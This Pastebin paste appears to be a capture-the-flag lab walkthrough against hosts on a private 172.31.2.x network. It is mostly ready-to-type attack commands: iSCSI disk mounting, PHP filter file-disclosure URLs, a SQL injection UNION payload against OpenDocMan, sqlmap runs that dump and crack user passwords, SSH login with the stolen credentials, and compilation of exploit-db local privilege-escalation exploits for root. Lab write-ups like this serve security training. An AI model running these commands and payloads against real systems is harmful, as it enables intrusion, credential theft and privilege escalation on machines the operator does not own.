API tools faq
paste
joemccray

217 attack steps

joemccray
Dec 20th, 2017
1,093
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.14 KB | None | 0 0
raw download clone embed print report
  1. How to go after 172.31.2.238
  2. Reference: https://t0w3ntum.com/2017/01/07/baffle/
  3.  
  4.  
  5. ---------------------------------------------------------------
  6. sudo nmap -sV -p 3260 172.31.2.217
  7.  
  8.  
  9. sudo apt install open-iscsi
  10.  
  11. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  12.  
  13. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  14.  
  15. sudo iscsiadm -m node -p 172.31.2.217 --login
  16.  
  17. sudo /bin/bash
  18.  
  19. fdisk -l
  20. ***** look for /dev/sda5 - Linux swap / Solaris *******
  21.  
  22. mkdir /mnt/217vm
  23.  
  24. mount /dev/sdb /mnt/217vm
  25.  
  26. cd /mnt/217vm
  27.  
  28. ls
  29.  
  30. cat flag1.txt
  31.  
  32. file bobsdisk.dsk
  33.  
  34. mkdir /media/bobsdisk
  35.  
  36. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  37.  
  38. /mnt/217vm# ls
  39.  
  40. cd /media/bobsdisk/
  41.  
  42. ls
  43.  
  44. cat ToAlice.eml
  45.  
  46. file bobsdisk.dsk
  47.  
  48. mkdir /media/bobsdisk
  49.  
  50. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  51.  
  52. /mnt/217vm# ls
  53.  
  54. cd /media/bobsdisk/
  55.  
  56. ls
  57.  
  58. cat ToAlice.eml
  59.  
  60. file ToAlice.csv.enc
  61.  
  62. file bobsdisk.dsk
  63.  
  64. pwd
  65.  
  66. mkdir /media/bobsdisk
  67.  
  68.  
  69. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  70.  
  71. ls
  72.  
  73. cd /media/bobsdisk/
  74.  
  75. ls
  76.  
  77. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  78.  
  79. ls
  80.  
  81. cat ToAlice.eml | grep flag
  82.  
  83. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  84.  
  85. ls
  86.  
  87. cat ToAlice.eml
  88. ***** look for supercalifragilisticoespialidoso ******
  89.  
  90. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  91.  
  92. supercalifragilisticoespialidoso
  93.  
  94.  
  95. ls
  96.  
  97. cat ToAlice.csv
  98.  
  99. -----------------------------------------------------
  100. Web Path,Reason
  101. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  102. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  103. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  104.  
  105. -----------------------------------------------------
  106.  
  107. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  108. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  109. -- view source
  110.  
  111. Found this string in the source:
  112. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  113. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  114. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  115. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  116. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  117. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  118. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  119. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  120. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  121. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  122.  
  123. ------ https://www.base64decode.org/ -------
  124. ------ Decoded, but didn't find a flag -----
  125.  
  126.  
  127. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  128. -- view source --
  129. -- Nothing in source --
  130.  
  131. Browsed to the flag link:
  132. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  133. -- view source --
  134. -- Nothing in source --
  135.  
  136.  
  137. Tried a PHP base64 decode with the URL:
  138. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  139. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  140. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  141.  
  142. ------ https://www.base64decode.org/ -------
  143. Use the string found here:
  144. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  145.  
  146. -------------------------------------------------------------------
  147. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  148. -------------------------------------------------------------------
  149. <?php
  150. defined ('VIAINDEX') or die('Ooooh! So close..');
  151. ?>
  152. <h1>Flag</h1>
  153. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  154. <img src="trollface.png" />
  155. <?php
  156. // Ok, ok. Here's your flag!
  157. //
  158. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  159. //
  160. // Well done, you're doing great so far!
  161. // Next step. SHELL!
  162. //
  163. //
  164. // Oh. That flag above? You're gonna need it...
  165. ?>
  166.  
  167.  
  168.  
  169.  
  170.  
  171. ============================================ Attacking another server because I need a reverse shell =========================================
  172. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  173.  
  174. Attack steps:
  175. -------------
  176.  
  177.  
  178.  
  179. Step 1: Ping sweep the target network
  180. -------------------------------------
  181.  
  182.  
  183. ---------------------------Type This-----------------------------------
  184. nmap -sP 172.31.2.0/24
  185. -----------------------------------------------------------------------
  186.  
  187.  
  188.  
  189. - Found 3 hosts
  190. 172.31.2.64
  191. 172.31.2.217
  192. 172.31.2.238
  193.  
  194.  
  195.  
  196. Step 2: Port scan target system
  197. -------------------------------
  198.  
  199.  
  200. ---------------------------Type This-----------------------------------
  201. nmap -sV 172.31.2.64
  202. -----------------------------------------------------------------------
  203.  
  204.  
  205.  
  206. -------------Scan Results--------------------------------------------
  207. PORT STATE SERVICE VERSION
  208. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  209. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  210. 514/tcp filtered shell
  211. 1037/tcp filtered ams
  212. 6667/tcp open irc ngircd
  213. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  214. --------------------------------------------------------------------
  215.  
  216.  
  217. Step 3: Vulnerability Scan the webserver
  218. ----------------------------------------
  219.  
  220.  
  221. ---------------------------Type This-----------------------------------
  222. cd ~/toolz/
  223.  
  224. rm -rf nikto*
  225.  
  226. git clone https://github.com/sullo/nikto.git Nikto2
  227.  
  228. cd Nikto2/program
  229.  
  230. perl nikto.pl -h 172.31.2.64
  231. -----------------------------------------------------------------------
  232.  
  233.  
  234. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  235. -----------------------------------------------------------------------------
  236.  
  237.  
  238. ---------------------------Type This-----------------------------------
  239. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  240.  
  241. perl Webr00t.pl -h 172.31.2.64 -v
  242. -----------------------------------------------------------------------
  243. or with dirbuster (dirb)
  244.  
  245. ---------------------------Type This-----------------------------------
  246. git clone https://github.com/v0re/dirb.git
  247.  
  248. cd dirb/
  249.  
  250. ./configure
  251.  
  252. make
  253.  
  254. dirb
  255.  
  256. ./dirb http://172.31.2.64 wordlists/big.txt
  257. -----------------------------------------------------------------------
  258.  
  259.  
  260.  
  261. Step 5: Browse the web site to look for clues
  262. ---------------------------------------------
  263. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  264.  
  265.  
  266. ..... really didn't get much from here so we just opened the web page in a browser
  267. http://172.31.2.64/
  268.  
  269. .....browsed to the webpage and saw that it pointed to:
  270. http://172.31.2.64/jabc
  271.  
  272. ....clicked on documentation link and found hidden text that pointed to here:
  273. http://172.31.2.64/jabcd0cs/
  274.  
  275. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  276. https://www.exploit-db.com/exploits/32075/
  277.  
  278. Tried the sql injection described in exploit-db:
  279. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  280.  
  281. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  282.  
  283.  
  284.  
  285. Tried to run sqlmap against the target
  286.  
  287.  
  288. ---------------------------Type This-----------------------------------
  289. cd sqlmap-dev/
  290. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  291.  
  292. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  293.  
  294. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  295.  
  296. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  297.  
  298. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  299. -----------------------------------------------------------------------
  300.  
  301.  
  302.  
  303. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  304. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  305.  
  306.  
  307.  
  308. ---------------------------Type This-----------------------------------
  309. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  310.  
  311. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  312. -----------------------------------------------------------------------
  313.  
  314. username: webmin
  315. hash: b78aae356709f8c31118ea613980954b
  316.  
  317. https://hashkiller.co.uk/md5-decrypter.aspx
  318.  
  319. hash: b78aae356709f8c31118ea613980954b
  320. pass: webmin1980
  321.  
  322.  
  323. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  324.  
  325.  
  326.  
  327. ---------------------------Type This-----------------------------------
  328. ssh -l webmin 172.31.2.64
  329. webmin1980
  330.  
  331. id
  332.  
  333. cat /etc/*release
  334. -----------------------------------------------------------------------
  335.  
  336.  
  337.  
  338. ....tired of not having a real command shell...
  339.  
  340.  
  341. ---------------------------Type This-----------------------------------
  342. python -c 'import pty;pty.spawn("/bin/bash")'
  343.  
  344.  
  345. cd /tmp
  346.  
  347. pwd
  348.  
  349.  
  350. cat >> exploit.c << out
  351.  
  352. **************paste in the content from here *****************
  353. https://www.exploit-db.com/raw/39166/
  354.  
  355.  
  356. ------ hit enter a few times ------
  357.  
  358. ------ then type 'out' ----- this closes the file handle...
  359.  
  360.  
  361.  
  362. ---------------------------Type This-----------------------------------
  363. gcc -o boom exploit.c
  364.  
  365. ./boom
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369. ------------exploit failed, damn let's try another one ---------
  370.  
  371.  
  372.  
  373. ---------------------------Type This-----------------------------------
  374. cat >> exploit2.c << out
  375.  
  376. **************paste in the content from here *****************
  377. https://www.exploit-db.com/raw/37292/
  378.  
  379.  
  380. out
  381.  
  382.  
  383. gcc -o boom2 exploit2.c
  384.  
  385. ./boom2
  386.  
  387. id
  388.  
  389.  
  390. ......YEAH - do the happy dance!!!!
  391. =============================================== Now back to the previous server ==============================================================
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!